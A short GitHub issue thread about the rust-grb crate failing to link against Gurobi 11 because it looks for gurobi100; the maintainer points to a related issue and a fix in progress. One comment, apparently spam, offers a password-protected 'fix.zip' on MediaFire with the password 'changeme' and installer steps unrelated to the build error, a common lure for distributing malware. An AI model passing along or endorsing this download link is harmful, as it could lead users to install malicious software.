### ISSUE TITLE
Gurobi 11 support

### ISSUE THREAD

**Issue by elefthei** [ykrist/rust-grb#14]
In the README.md it says Gurobi 11 is supported, but when I `cargo build` I get the following error
```
  = note: /usr/bin/ld: cannot find -lgurobi100: No such file or directory
          collect2: error: ld returned 1 exit status
```

Which means gurobi 10 is hardcoded. Is it possible to fix?

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ykrist** [comment]
Hi, I think this is the same issue as #9.  There's a fix in progress which you can try out, I'd appreciate feedback to see if it's working for others.
